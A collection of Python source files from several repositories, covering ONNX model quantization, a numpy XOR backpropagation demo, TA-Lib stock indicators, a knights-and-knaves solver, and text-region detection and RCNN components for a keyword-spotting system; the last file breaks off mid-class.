dispatching_table[dispatching.operation] = TargetPlatform(dispatching.platform)
for operation in graph.operations.values():
assert operation.name in dispatching_table, (
f'Internal Error, Can not find operation {operation.name} in dispatching table.')
operation.platform = dispatching_table[operation.name]
# insert necessary device switchers.
formatter(GraphCommand(GraphCommandType.INSERT_SWITCHER))
return graph
__all__ = ['load_onnx_graph', 'load_caffe_graph', 'dump_torch_to_onnx', 'quantize_onnx_model',
'quantize_torch_model', 'export_ppq_graph', 'format_graph']
``` |
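A minimal end-to-end sketch of the API above; the model path, calibration data, collate function and platform choice are placeholders and not part of the original module.

```python
# Sketch only: quantize an ONNX model with the functions defined above.
import torch
from torch.utils.data import DataLoader

calib_data = [torch.randn(3, 224, 224) for _ in range(32)]   # fake calibration samples
calib_loader = DataLoader(calib_data, batch_size=1)

graph = quantize_onnx_model(
    onnx_import_file='model.onnx',                # hypothetical file
    calib_dataloader=calib_loader,
    calib_steps=32,
    input_shape=[1, 3, 224, 224],
    collate_fn=lambda x: x.to('cuda'),            # assumed preprocessing step
    platform=TargetPlatform.PPL_CUDA_INT8,
    device='cuda')

export_ppq_graph(graph, platform=TargetPlatform.PPL_CUDA_INT8,
                 graph_save_to='quantized.onnx', config_save_to='quantized.json')
```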
{
"source": "Joker2770/My_TensorFlow_Lab",
"score": 2
} |
#### File: src/tf1.x/_07_BPXOR.py
```python
import numpy as np
import matplotlib.pyplot as plt
# Input data
X = np.array([[0,0],[0,1], [1,0],[1,1]])
# Labels
T = np.array([[0],[1],[1],[0]])
# Define a 2-layer neural network: 2-10-1
# 2 neurons in the input layer, 10 in the hidden layer, 1 in the output layer
# Initialize the input-to-hidden weights, 2 rows x 10 columns
W1 = np.random.random([2,10])
# Initialize the hidden-to-output weights, 10 rows x 1 column
W2 = np.random.random([10,1])
# Initialize the biases; biases are usually set to 0 or a small constant such as 0.1
# Biases for the 10 hidden neurons
b1 = np.zeros([10])
# Bias for the single output neuron
b2 = np.zeros([1])
# Learning rate
lr = 0.1
# Number of training epochs
epochs = 100001
# Interval (in epochs) at which the loss is evaluated
test = 5000
# Sigmoid activation
def sigmoid(x):
    return 1/(1+np.exp(-x))
# Derivative of sigmoid (expects the already-activated output as input)
def dsigmoid(x):
    return x*(1-x)
# Update the weights and biases
def update():
    global X,T,W1,W2,lr,b1,b2
    # Hidden layer output
    L1 = sigmoid(np.dot(X,W1) + b1)
    # Output layer output
    L2 = sigmoid(np.dot(L1,W2) + b2)
    # Eq. 2.41: learning signal (delta) of the output layer
    delta_L2 = (T - L2)*dsigmoid(L2)
    # Eq. 2.42: learning signal (delta) of the hidden layer
    delta_L1 = delta_L2.dot(W2.T)*dsigmoid(L1)
    # Eq. 2.44: weight change from the hidden layer to the output layer,
    # averaged because several samples are processed at once
    delta_W2 = lr*(L1.T.dot(delta_L2))/X.shape[0]
    # Eq. 2.45: weight change from the input layer to the hidden layer,
    # averaged because several samples are processed at once
    delta_W1 = lr*(X.T.dot(delta_L1))/X.shape[0]
    # Apply the weight updates
    W2 = W2 + delta_W2
    W1 = W1 + delta_W1
    # Update the biases, averaged over the samples
    b2 = b2 + lr*np.mean(delta_L2, axis=0)
    b1 = b1 + lr*np.mean(delta_L1, axis=0)
# Empty list used to record the loss
loss = []
# Train the model
for i in range(epochs):
    # Update the weights
    update()
    # Compute the loss once every 5000 epochs
    if i%test == 0:
        # Hidden layer output
        L1 = sigmoid(np.dot(X,W1) + b1)
        # Output layer output
        L2 = sigmoid(np.dot(L1,W2) + b2)
        # Compute and print the loss
        print('epochs',i,'loss',np.mean(np.square(T - L2)/2))
        # Record the loss
        loss.append(np.mean(np.square(T - L2)/2))
# Plot the loss against the number of training epochs
plt.plot(range(0,epochs,test),loss)
plt.xlabel('epochs')
plt.ylabel('loss')
plt.show()
# Hidden layer output
L1 = sigmoid(np.dot(X,W1) + b1)
# Output layer output
L2 = sigmoid(np.dot(L1,W2) + b2)
print('output')
print(L2)
# Since the final classes are only 0 and 1, values >= 0.5 are
# assigned to class 1 and values < 0.5 to class 0
def predict(x):
    if x>=0.5:
        return 1
    else:
        return 0
# map applies predict to every value in L2 in turn,
# and the results are printed one by one
print('predict')
for i in map(predict,L2):
    print(i)
``` |
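For reference, the rules implemented by `update()` above are the standard two-layer backpropagation updates, restated compactly below (a sketch, not taken from the referenced textbook: σ is the sigmoid, η the learning rate, m the number of samples; since `dsigmoid` receives the already-activated output, σ'(L) = L(1−L) in the code).

```latex
% Backpropagation updates used in update() above
\delta_2 = (T - L_2)\odot L_2(1-L_2), \qquad
\delta_1 = \bigl(\delta_2 W_2^{\top}\bigr)\odot L_1(1-L_1) \\[4pt]
\Delta W_2 = \tfrac{\eta}{m}\,L_1^{\top}\delta_2, \qquad
\Delta W_1 = \tfrac{\eta}{m}\,X^{\top}\delta_1, \qquad
b_k \leftarrow b_k + \eta\,\overline{\delta_k}
```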
{
"source": "Joker2770/stock_analysis_cn",
"score": 3
} |
#### File: stock_analysis_cn/src/talib_simple_usage.py
```python
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# Display Chinese characters and minus signs correctly in plots
from pylab import mpl
mpl.rcParams['font.sans-serif']=['SimHei']
mpl.rcParams['axes.unicode_minus']=False
# Import the TA-Lib library
import talib as ta
# Use tushare to fetch market data for the example analysis
import tushare as ts
#1.2.48
print(ts.__version__)
###################################################
'''
Stock code
'''
stock_code = "000001"
'''
Start date
'''
start_time = "2019-08-01"
###################################################
def get_data(code,start='2015-01-01'):
df=ts.get_k_data(code,start)
df.index=pd.to_datetime(df.date)
df=df.sort_index()
return df
# Get the open, close, high and low prices of the stock
df=get_data(stock_code)[['open','close','high','low']]
# Average of open, high, low and close
df['average']=ta.AVGPRICE(df.open,df.high,df.low,df.close)
# Average of high and low
df['median']=ta.MEDPRICE(df.high,df.low)
# Average of high, low and close
df['typical']=ta.TYPPRICE(df.high,df.low,df.close)
# Weighted price of high, low and close
df['weight']=ta.WCLPRICE(df.high,df.low,df.close)
df.head()
'''
Generic function name: MA
Usage: ta.MA(close, timeperiod=30, matype=0)
The moving-average family of indicators includes: SMA (simple moving average),
EMA (exponential moving average),
WMA (weighted moving average),
DEMA (double exponential moving average),
TEMA (triple exponential moving average),
TRIMA (triangular moving average),
KAMA (Kaufman adaptive moving average),
MAMA (MESA adaptive moving average),
T3 (triple exponential moving average).
Here close is the closing-price time series, timeperiod is the window length (default 30 days),
and matype selects the indicator type: 0=SMA, 1=EMA, 2=WMA, 3=DEMA, 4=TEMA, 5=TRIMA, 6=KAMA, 7=MAMA, 8=T3 (Default=SMA)
'''
types=['SMA','EMA','WMA','DEMA','TEMA',
'TRIMA','KAMA','MAMA','T3']
df_ma=pd.DataFrame(df.close)
for i in range(len(types)):
df_ma[types[i]]=ta.MA(df.close,timeperiod=5,matype=i)
df_ma.tail()
df_ma.loc[start_time:].plot(figsize=(12,6))
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
plt.title('上证指数各种类型移动平均线',fontsize=15)
plt.xlabel('')
plt.show()
'''
Calculation: first compute the standard deviation (SD) of the closing price over the past N days,
usually multiplied by 2 to get 2 standard deviations; the Up band is the N-day moving average plus
2 standard deviations, and the Down band is the N-day moving average minus 2 standard deviations.
Usage: ta.BBANDS(close, timeperiod=5, nbdevup=2, nbdevdn=2, matype=0)
'''
H_line,M_line,L_line=ta.BBANDS(df.close, timeperiod=20, nbdevup=2, nbdevdn=2, matype=0)
df1=pd.DataFrame(df.close,index=df.index,columns=['close'])
df1['H_line']=H_line
df1['M_line']=M_line
df1['L_line']=L_line
df1.tail()
df1.loc[start_time:].plot(figsize=(12,6))
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
plt.title(u'上证指数布林线',fontsize=15)
plt.xlabel('')
plt.show()
# Plot the 5-, 30-, 120- and 250-day exponential moving averages
N=[5,30,120,250]
for i in N:
df['ma_'+str(i)]=ta.EMA(df.close,timeperiod=i)
df.tail()
df.loc[start_time:,['close','ma_5','ma_30','ma_120','ma_250']].plot(figsize=(12,6))
ax = plt.gca()
ax.spines['right'].set_color('none')
ax.spines['top'].set_color('none')
plt.title('上证指数走势',fontsize=15)
plt.xlabel('')
plt.show()
``` |
{
"source": "joker314/knights-and-knaves",
"score": 4
} |
#### File: joker314/knights-and-knaves/main.py
```python
class Person:
def __init__(self, is_truthful):
self.truthful: bool = bool(int(is_truthful))
def said(self, claim):
return claim if self.truthful else not claim
def is_liar(self):
return not self.truthful
def is_truth_teller(self):
return self.truthful
def __eq__(self, person):
return self.truthful == person.truthful
def __ne__(self, person):
return self.truthful != person.truthful
def list_solutions(num_of_people: int, check_function):
"""
Brute force checks all 2^n states and return those that are valid.
:param num_of_people: The number of people in this scenario.
:param check_function: The function the array will be passed to, to check if it conforms to the problem.
:return: A list of possible binary state strings, where each digit corresponds to the truthiness of a person.
"""
solutions: list[str] = []
# There are 2^n possible outcomes.
for state in range(2 ** num_of_people):
# Remove "0b" and pad to length "num_of_people", to create a bitarray representing truth tellers and liars.
binary_repr: str = bin(state)[2:].zfill(num_of_people)
# Create the world of people possible with this configuration.
possible_world: list[Person] = [Person(c) for c in binary_repr]
if check_function(possible_world):
solutions.append(binary_repr)
return solutions
# Your code goes below! Describe the problem and it should solve it.
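# Worked example (not from the original file): A says "B is a liar";
# B says "A and I are of different kinds". Person.said(claim) already encodes
# consistency: a knight's claim must be true, a knave's claim must be false.
def example_check(world):
    a, b = world
    return a.said(b.is_liar()) and b.said(a != b)


print(list_solutions(2, example_check))  # ['01'] -> A is a knave, B is a knight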
``` |
{
"source": "joker452/Keyword-spotting-system",
"score": 3
} |
#### File: Keyword-spotting-system/locator/dtp.py
```python
import os
import cv2
from threading import Thread, Lock
from queue import Queue
import numpy as np
from PIL import Image, ImageDraw
def extract_regions(t_img, c_range, r_range, w_range, h_range):
all_boxes = []
min_w, max_w = w_range
min_h, max_h = h_range
for r in r_range:
for c in c_range:
s_img = cv2.morphologyEx(t_img, cv2.MORPH_CLOSE, np.ones((r, c), dtype=np.ubyte))
n, l_img, stats, centroids = cv2.connectedComponentsWithStats(s_img, connectivity=4)
boxes = [[b[0], b[1], b[0] + b[2], b[1] + b[3]] for b in stats
if min_w <= b[2] <= max_w and min_h <= b[3] <= max_h]
all_boxes += boxes
return all_boxes
def find_regions(img, threshold_range, c_range, r_range, w_range, h_range):
"""
Extracts DTP from an image using different thresholds and morphology kernels
"""
ims = []
for t in threshold_range:
ims.append((img < t).astype(np.ubyte))
ab = []
for t_img in ims:
ab += extract_regions(t_img, c_range, r_range, w_range, h_range)
return ab
def unique_boxes(boxes):
tmp = np.array(boxes)
ncols = tmp.shape[1]
dtype = tmp.dtype.descr * ncols
struct = tmp.view(dtype)
uniq, index = np.unique(struct, return_index=True)
tmp = uniq.view(tmp.dtype).reshape(-1, ncols)
return tmp, index
def extract_dtp(out_dir, file_names, c_range, r_range, w_range, h_range, multiple_thresholds=True):
# extract regions
lock = Lock()
q = Queue()
for i, file_name in enumerate(file_names):
q.put((i, file_name))
def worker():
while True:
i, file_name = q.get()
lock.acquire()
print('Processing image %d / %d' % (i, len(file_names)))
lock.release()
try:
img = cv2.imread(file_name, cv2.IMREAD_GRAYSCALE)
image = Image.fromarray(img)
d = ImageDraw.Draw(image)
m = img.mean()
if multiple_thresholds:
threshold_range = np.arange(0.7, 1.2, 0.1) * m
else:
threshold_range = np.array([0.9]) * m
region_proposals = find_regions(img, threshold_range, c_range, r_range, w_range, h_range)
region_proposals, _ = unique_boxes(region_proposals)
total = 0
regions = []
for region in region_proposals:
x1, y1, x2, y2 = region
d.rectangle([x1, y1, x2, y2], outline="white")
total += 1
regions.append((x1, y1, x2, y2))
save_name = os.path.normpath(file_name).split(os.sep)
save_name = save_name[-1].split('.')[0]
name = out_dir + save_name + '_dtp.npz'
np.savez_compressed(name, regions=regions, total=total)
image.save(os.path.join(out_dir, 'image', save_name + '.jpg'))
except:
lock.acquire()
print('exception thrown with file', file_name)
lock.release()
q.task_done()
num_workers = 8
for i in range(num_workers):
t = Thread(target=worker)
t.daemon = True
t.start()
q.join()
if __name__ == '__main__':
image_dir = '/data2/dengbowen/color_out'
image_names = [os.path.join(image_dir, f) for f in os.listdir(image_dir) if f.endswith('.jpg')]
out_dir = "/data2/dengbowen/difangzhi_dtp/"
c_range = list(range(1, 80, 5))
r_range = list(range(1, 75, 5))
w_range = (33, 284)
h_range = (44, 310)
extract_dtp(out_dir, image_names, c_range, r_range, w_range, h_range, multiple_thresholds=True)
```
#### File: locator/OCR/evaluate_box.py
```python
import os
import numpy as np
import torch
from PIL import Image, ImageDraw
def bbox_overlaps(boxes, query_boxes):
"""
Parameters
----------
all boxes form: x1, y1, x2, y2
boxes: (N, 4) ndarray
query_boxes: (K, 4) ndarray
Returns
-------
overlaps: (N, K) overlap between boxes and query_boxes
from https://github.com/ruotianluo/pytorch-faster-rcnn/blob/master/lib/utils/bbox.py
"""
boxes = torch.as_tensor(boxes, dtype=torch.float64)
query_boxes = torch.as_tensor(query_boxes, dtype=torch.float64)
# (N,)
box_areas = (boxes[:, 2] - boxes[:, 0]) * (boxes[:, 3] - boxes[:, 1])
# (K,)
query_areas = (query_boxes[:, 2] - query_boxes[:, 0]) * (query_boxes[:, 3] - query_boxes[:, 1])
iw = (torch.min(boxes[:, 2:3], query_boxes[:, 2:3].t()) - torch.max(boxes[:, 0:1], query_boxes[:, 0:1].t())).clamp(
min=0)
ih = (torch.min(boxes[:, 3:4], query_boxes[:, 3:4].t()) - torch.max(boxes[:, 1:2], query_boxes[:, 1:2].t())).clamp(
min=0)
ua = box_areas.view(-1, 1) + query_areas.view(1, -1) - iw * ih
overlaps = iw * ih / ua
return overlaps
def evaluate(gt_dir, detect_dir, threshold):
gt_box_files = os.listdir(gt_dir)
re = []
pr = []
for i, file_name in enumerate(gt_box_files):
gt_boxes = []
detect_boxes = []
with open(os.path.join(gt_dir, file_name), 'r', encoding='utf-8') as f:
for line in f:
gt_boxes.append(list(map(int, line.split()[0: 4])))
try:
with open(os.path.join(detect_dir, file_name), 'r', encoding='utf-8') as f:
for line in f:
detect_boxes.append(list(map(int, line.split()[0: 4])))
except:
print("%s not found!" % os.path.join(detect_dir, file_name))
input_boxes = np.asarray(detect_boxes[::-1])
target_boxes = np.asarray(gt_boxes)
B1 = input_boxes.shape[0]
B2 = target_boxes.shape[0]
ious = bbox_overlaps(input_boxes, target_boxes).view(1, B1, B2)
# N x B2
# find the input boxes having max overlap with each gt box
target_max_iou, target_idx = torch.max(ious, dim=1)
pos_mask = torch.gt(target_max_iou, threshold)
TP = 0
box_id, index = target_idx.sort()
i = 0
l = box_id.size(1)
while i < l:
current_max = target_max_iou[0][index[0][i].item()]
j = i + 1
while j < l and box_id[0][j] == box_id[0][i]:
temp = target_max_iou[0][index[0][j].item()]
current_max = temp if temp > current_max else current_max
j += 1
if current_max > threshold:
TP += 1
i = j
recall = TP / B2
precision = TP / B1
re.append(recall)
pr.append(precision)
print(file_name + " TP:{} Total Detection:{} Total GT:{}".format(TP, B1, B2), end='')
print(" Recall:{:.2%}".format(recall), end='')
print(" Precision:{:.2%}".format(precision))
print("*" * 30)
print("Avg recall:{:.2%} Avg precision:{:.2%}".format(sum(re) / len(re), sum(pr) / len(pr)))
if __name__ == '__main__':
evaluate('c:/users/deng/desktop/g', 'c:/users/deng/desktop/d', 0.5)
```
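For reference, the overlap computed by `bbox_overlaps` above is the standard intersection-over-union between a detection b and a ground-truth box q:

```latex
\mathrm{IoU}(b, q) = \frac{\operatorname{area}(b \cap q)}
                          {\operatorname{area}(b) + \operatorname{area}(q) - \operatorname{area}(b \cap q)}
```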
#### File: Keyword-spotting-system/locator/preprocess.py
```python
import os
import cv2
import shutil
import numpy as np
from PIL import ImageDraw, Image
from utils.util import mkdir
def binary_fillhole(img):
# blackhat
element = cv2.getStructuringElement(cv2.MORPH_CROSS, (33, 33), anchor=(16, 16))
img = cv2.morphologyEx(img, cv2.MORPH_BLACKHAT, element)
h, w, _ = img.shape
img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
# otsu binary
cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU, dst=img)
# fill small holes
element = cv2.getStructuringElement(cv2.MORPH_RECT, (5, 5))
img = cv2.morphologyEx(img, cv2.MORPH_CLOSE, element)
return img
def find_region(row_value_threshold, col_value_threshold, row_range_threshold, col_range_threshold, need_range):
global h, w
row_candidate = np.argwhere(row_sum > row_value_threshold * w * 255)
col_candidate = np.argwhere(col_sum > col_value_threshold * h * 255)
row_start = col_start = 0
row_end = h
col_end = w
if need_range:
if row_candidate.size > 0:
start_candidate = row_candidate[row_candidate < row_range_threshold[0] * h]
end_candidate = row_candidate[row_candidate > row_range_threshold[1] * h]
if start_candidate.size > 0:
row_start = start_candidate[0]
if end_candidate.size > 0:
row_end = end_candidate[0]
if col_candidate.size > 0:
start_candidate = col_candidate[col_candidate < col_range_threshold[0] * w]
end_candidate = col_candidate[col_candidate > col_range_threshold[1] * w]
if start_candidate.size > 0:
col_start = start_candidate[0]
if end_candidate.size > 0:
col_end = end_candidate[0]
else:
row_start, row_end = row_candidate[0][0], row_candidate[-1][0]
col_start, col_end = col_candidate[0][0], col_candidate[-1][0]
return row_start, col_start, row_end, col_end
# \\ is requried at the end of the path
img_dir = r"c:\Users\Deng\Desktop\difangzhi\out\\"
images = [img_dir + f.name for f in os.scandir(img_dir) if f.name.endswith("jpg")]
images.sort(key=lambda item: (len(item), item))
mkdir("bw_out")
mkdir("color_out")
for i, image_path in enumerate(images):
text_path = img_dir + image_path.split('\\')[-1][: -3] + 'txt'
color_img = cv2.imread(image_path)
img = np.copy(color_img)
img = binary_fillhole(img)
h, w = img.shape
row_sum = np.sum(img, 1)
col_sum = np.sum(img, 0)
row_start, col_start, row_end, col_end = find_region(0.5, 0.5, (0.35, 0.7), (0.35, 0.9), True)
if row_start == 0 or col_start == 0:
row_start, col_start, row_end, col_end = find_region(0.01, 0.02, (0, 0), (0, 0), False)
new_lines = []
with open(text_path, 'r', encoding='utf-8') as f:
lines = f.readlines()
for line in lines:
line_split = line.split()
x1, y1, x2, y2 = map(int, line_split[0: 4])
x1 -= col_start
y1 -= row_start
x2 -= col_start
y2 -= row_start
new_line = str(x1) + ' ' + str(y1) + ' ' + str(x2) + ' ' + str(y2) + ' '
for s in line_split[4: -1]:
new_line += s + ' '
new_line += line_split[-1] + '\n'
new_lines.append(new_line)
with open('./bw_out/{}.txt'.format(i), 'w', encoding='utf-8') as f:
f.writelines(new_lines)
img = img[row_start: row_end, col_start: col_end]
color_img = color_img[row_start: row_end, col_start: col_end]
cv2.imwrite("./bw_out/{}.jpg".format(i), img)
cv2.imwrite("./color_out/{}.jpg".format(i), color_img)
shutil.copyfile('./bw_out/{}.txt'.format(i), './color_out/{}.txt'.format(i))
```
#### File: rcnn/misc/batch_bilinear_sampler_bhwd.py
```python
import torch
import torch.nn.functional as F
"""
BatchBilinearSamplerBHWD efficiently performs bilinear sampling to pull out
multiple patches from a single input image.
Inputs:
- inputImages: Tensor of shape (C, H, W)
- grids: Tensor of shape (N, HH, WW, 2)
Output:
- Tensor of shape (N, C, HH, WW) which is the result of applying each
sampling grid to the input image.
"""
class BatchBilinearSamplerBHWD(torch.nn.Module):
def check(self, input):
inputImages = input[0]
grids = input[1]
assert inputImages.ndimension() == 4
assert inputImages.size(0) == grids.size(0) # batch
assert grids.size(3) == 2 # coordinates
def forward(self, input):
# -- inputImages should be C x H x W
# -- grids should be B x HH x WW x 2
inputImages, grids = input[0], input[1]
assert grids.dim() == 4
B = grids.size(0)
assert inputImages.dim() == 3
C, H, W = inputImages.size(0), inputImages.size(1), inputImages.size(2)
inputImageView = torch.unsqueeze(inputImages, dim=0).expand(B, C, H, W)
self.check((inputImageView, grids))
output = F.grid_sample(inputImageView, grids)
return output
```
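A shape-only usage sketch for the sampler above (the import path is an assumption); `F.grid_sample` expects grid coordinates normalized to [-1, 1].

```python
# Pull 5 patches of 32x32 from a single 3-channel 256x256 image (shapes are illustrative).
import torch

from misc.batch_bilinear_sampler_bhwd import BatchBilinearSamplerBHWD  # assumed path

sampler = BatchBilinearSamplerBHWD()
image = torch.randn(3, 256, 256)            # C x H x W
grids = torch.rand(5, 32, 32, 2) * 2 - 1    # B x HH x WW x 2, coords in [-1, 1]
patches = sampler((image, grids))
print(patches.shape)                        # torch.Size([5, 3, 32, 32])
```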
#### File: rcnn/misc/box_sampler.py
```python
import torch
import torch.nn as nn
from . import utils
from . import box_utils
from . import boxIoU
class BoxSampler(nn.Module):
def __init__(self, opt, logger):
super(BoxSampler, self).__init__()
self.opt = {}
self.low_thresh = utils.getopt(opt, 'low_thresh', 0.4)
self.high_thresh = utils.getopt(opt, 'high_thresh', 0.75)
self.batch_size = utils.getopt(opt, 'batch_size', 256)
self.x_min, self.x_max = None, None
self.y_min, self.y_max = None, None
self.logger = logger
def unpack_dims(self, input_boxes, target_boxes):
N, B1 = input_boxes.size(0), input_boxes.size(1)
B2 = target_boxes.size(1)
assert N == 1, "Only 1-element minibatches are supported"
assert input_boxes.size(2) == 4 and target_boxes.size(2) == 4
assert target_boxes.size(0) == N
return N, B1, B2
def setBounds(self, bounds):
self.x_min = utils.getopt(bounds, 'x_min', None)
self.x_max = utils.getopt(bounds, 'x_max', None)
self.y_min = utils.getopt(bounds, 'y_min', None)
self.y_max = utils.getopt(bounds, 'y_max', None)
def forward(self, input):
with torch.no_grad():
input_boxes, target_boxes = input
# B1 = k * H * W
# B2 = number of words
N, B1, B2 = self.unpack_dims(input_boxes, target_boxes)
# For now, only support batch size of 1
input_boxes = input_boxes.view(B1, 4)
target_boxes = target_boxes.view(B2, 4)
# N x B1 x B2
# 1 X B1 x B2 overlaps between B1 input boxes and B2 gt boxes
ious = boxIoU.boxIoU(input_boxes, target_boxes).view(N, B1, B2)
# N x B1
# find the gt box having max overlap with each input box
input_max_iou, input_idx = torch.max(ious, dim=2)
# input_max_iou = input_max_iou.view(N, B1)
# N x B2
# find the input box having max overlap with each gt box
_, target_idx = torch.max(ious, dim=1)
# target_max_iou = target_max_iou.view(N, B2)
# N x B1
pos_mask = torch.gt(input_max_iou, self.high_thresh)
# N x B1
neg_mask = torch.lt(input_max_iou, self.low_thresh)
# remove over-bounded boxes
if self.x_min and self.y_min and self.x_max and self.y_max:
boxes_x1y1x2y2 = box_utils.xcycwh_to_x1y1x2y2(input_boxes)
x_min_mask = torch.lt(boxes_x1y1x2y2[:, 0], self.x_min).byte()
y_min_mask = torch.lt(boxes_x1y1x2y2[:, 1], self.y_min).byte()
x_max_mask = torch.gt(boxes_x1y1x2y2[:, 2], self.x_max).byte()
y_max_mask = torch.gt(boxes_x1y1x2y2[:, 3], self.y_max).byte()
pos_mask[x_min_mask] = 0
pos_mask[y_min_mask] = 0
pos_mask[x_max_mask] = 0
pos_mask[y_max_mask] = 0
neg_mask[x_min_mask] = 0
neg_mask[y_min_mask] = 0
neg_mask[x_max_mask] = 0
neg_mask[y_max_mask] = 0
# -- Count as positive each input box that has maximal IoU with each target box,
# -- even if it is outside the bounds or does not meet the thresholds.
# -- This is important since things will crash if we don't have at least one
# -- positive box.
# print("in box_sampler, total_pos:{}, total_neg:{}".format(pos_mask.sum().item(),
# neg_mask.sum().item()))
if pos_mask.sum().item() == 0:
pos_mask = pos_mask.scatter_(1, target_idx, 1)
neg_mask = neg_mask.scatter_(1, target_idx, 0)
pos_mask = pos_mask.view(B1).byte()
neg_mask = neg_mask.view(B1).byte()
if neg_mask.sum() == 0:
# -- There were no negatives; this can happen if all input boxes are either:
# -- (1) An input box with maximal IoU with a target box
# -- (2) Out of bounds, therefore clipped
# -- (3) max IoU to all target boxes is in the range [low_thresh, high_thresh]
# -- This should be a pretty rare case, but we still need to handle it.
# -- Ideally this should do something like sort the non-positive in-bounds boxes
# -- by their max IoU to target boxes and set the negative set to be those with
# -- minimal IoU to target boxes; however this is complicated so instead we'll
# -- just sample from non-positive boxes to get negatives.
# -- We'll also log this event in the __GLOBAL_STATS__ table; if this happens
# -- regularly then we should handle it more cleverly.
neg_mask = 1 - pos_mask # set neg_mask to inverse of pos_mask
self.logger.warning("In box_sampler.py, no negatives!")
# [total_pos, 1]-> total_pos
# containing pos boxes index in the total boxes
pos_mask_nonzero = pos_mask.nonzero().view(-1)
# [total_neg, 1]-> total_neg
neg_mask_nonzero = neg_mask.nonzero().view(-1)
total_pos = pos_mask_nonzero.size(0)
total_neg = neg_mask_nonzero.size(0)
num_pos = int(min(self.batch_size // 2, total_pos))
num_neg = self.batch_size - num_pos
pos_p = torch.ones(total_pos)
neg_p = torch.ones(total_neg)
# sample num_pos boxes from total_positive
pos_sample_idx = torch.multinomial(pos_p, num_pos, replacement=False)
neg_replace = total_neg < num_neg
neg_sample_idx = torch.multinomial(neg_p, num_neg, replacement=neg_replace)
if input_boxes.is_cuda:
pos_sample_idx = pos_sample_idx.cuda()
neg_sample_idx = neg_sample_idx.cuda()
# containing the positive box indexes in the total boxes after sampling
pos_input_idx = pos_mask_nonzero[pos_sample_idx]
# find the corresponding target box indexes
pos_target_idx = input_idx.view(-1)[pos_input_idx].view(num_pos)
neg_input_idx = neg_mask_nonzero[neg_sample_idx]
output = (pos_input_idx, pos_target_idx, neg_input_idx)
return output
```
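The sampler above leans on the repository's `utils`, `box_utils` and `boxIoU` helpers, so it is not runnable in isolation; a rough self-contained sketch of the same positive/negative split (hypothetical thresholds, plain x1y1x2y2 boxes) boils down to IoU thresholding:
```python
import torch

def iou_matrix(a, b):
    # a: (B1, 4), b: (B2, 4) in x1, y1, x2, y2 format -> (B1, B2) pairwise IoU
    area_a = (a[:, 2] - a[:, 0]) * (a[:, 3] - a[:, 1])
    area_b = (b[:, 2] - b[:, 0]) * (b[:, 3] - b[:, 1])
    lt = torch.max(a[:, None, :2], b[None, :, :2])  # intersection top-left
    rb = torch.min(a[:, None, 2:], b[None, :, 2:])  # intersection bottom-right
    wh = (rb - lt).clamp(min=0)
    inter = wh[..., 0] * wh[..., 1]
    return inter / (area_a[:, None] + area_b[None, :] - inter)

input_boxes = torch.tensor([[0., 0., 10., 10.], [50., 50., 60., 60.], [1., 1., 9., 9.]])
gt_boxes = torch.tensor([[0., 0., 10., 10.]])
max_iou, _ = iou_matrix(input_boxes, gt_boxes).max(dim=1)
pos_mask = max_iou > 0.75  # plays the role of high_thresh above
neg_mask = max_iou < 0.4   # plays the role of low_thresh above
print(max_iou, pos_mask, neg_mask)  # IoUs 1.0 / 0.0 / 0.64 -> one positive, one negative, one ignored
```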
#### File: rcnn/misc/localization_layer.py
```python
import torch
import easydict
import torch.nn as nn
import torch.nn.functional as F
from . import utils
from . import box_utils
from .make_anchors import MakeAnchors
from .box_sampler_helper import BoxSamplerHelper
from .bilinear_roi_pooling import BilinearRoiPooling
from .apply_box_transform import ApplyBoxTransform
from .invert_box_transform import InvertBoxTransform
from .reshape_box_features import ReshapeBoxFeatures
from .box_regression_criterion import BoxRegressionCriterion
class RPN(nn.Module):
def __init__(self, opt):
super(RPN, self).__init__()
if isinstance(opt.anchors, torch.Tensor): # debug mode
self.anchors = torch.Tensor(opt.anchors).t().clone()
elif opt.anchors == 'original':
# 2 x k w, h
self.anchors = torch.Tensor([[30, 30], [60, 60], [80, 80], [100, 100], [120, 120],
[30, 45], [60, 90], [80, 120], [100, 150], [120, 180],
[30, 20], [60, 20], [90, 60], [105, 70], [120, 80]]).t().clone()
self.anchors = self.anchors * opt.anchor_scale
# k
self.num_anchors = self.anchors.size(1)
self.std = opt.std
self.zero_box_conv = opt.zero_box_conv
s = 1
self.pad = opt.rpn_filter_size // 2
self.conv_layer = nn.Conv2d(opt.input_dim, opt.rpn_num_filters,
kernel_size=opt.rpn_filter_size, padding=self.pad)
self.head_filter_size = 1
self.box_conv_layer = nn.Conv2d(opt.rpn_num_filters, 4 * self.num_anchors, self.head_filter_size, stride=s)
self.rpn_conv_layer = nn.Conv2d(opt.rpn_num_filters, 2 * self.num_anchors, self.head_filter_size, stride=s)
self.reshape_box_features = ReshapeBoxFeatures(self.num_anchors)
x0, y0, sx, sy = opt.field_centers
self.make_anchors = MakeAnchors(x0, y0, sx, sy, self.anchors, opt.tunable_anchors)
self.apply_box_transform = ApplyBoxTransform()
self.box_conv_layer.weight.data.zero_()
self.box_conv_layer.bias.data.zero_()
self.w = opt.box_reg_decay
def init_weights(self):
with torch.no_grad():
self.conv_layer.weight.normal_(0, self.std)
self.conv_layer.bias.zero_()
if self.zero_box_conv:
self.box_conv_layer.weight.zero_()
else:
self.box_conv_layer.weight.normal_(0, self.std)
self.box_conv_layer.bias.zero_()
self.rpn_conv_layer.weight.normal_(0, self.std)
self.rpn_conv_layer.bias.zero_()
def forward(self, feats):
feats = F.relu(self.conv_layer(feats))
# Box branch
# Compute boxes
bfeats = self.box_conv_layer(feats)
act_reg = 0.5 * self.w * torch.pow(bfeats.norm(2), 2)
# create anchors according to feature shape
# this is the original anchor
anchors = self.make_anchors(bfeats)
# N x (D * k) x H x W-> N x (k * H * W) x D
anchors = self.reshape_box_features(anchors)
# reshape transforms and apply to anchors
# N x (D * k) x H x W-> N x (k * H * W) x D
trans = self.reshape_box_features(bfeats)
# calculate new x, y, w, h for anchor boxes
boxes = self.apply_box_transform((anchors, trans))
# Scores branch
scores = self.rpn_conv_layer(feats)
# N x (D * k) x H x W-> N x (k * H * W) x D
scores = self.reshape_box_features(scores)
return (boxes, anchors, trans, scores), act_reg
class LocalizationLayer(nn.Module):
def __init__(self, opt, logger):
super(LocalizationLayer, self).__init__()
# has its own opt
self.logger = logger
self.opt = easydict.EasyDict()
self.opt.input_dim = utils.getopt(opt, 'input_dim')
self.opt.output_size = utils.getopt(opt, 'output_size')
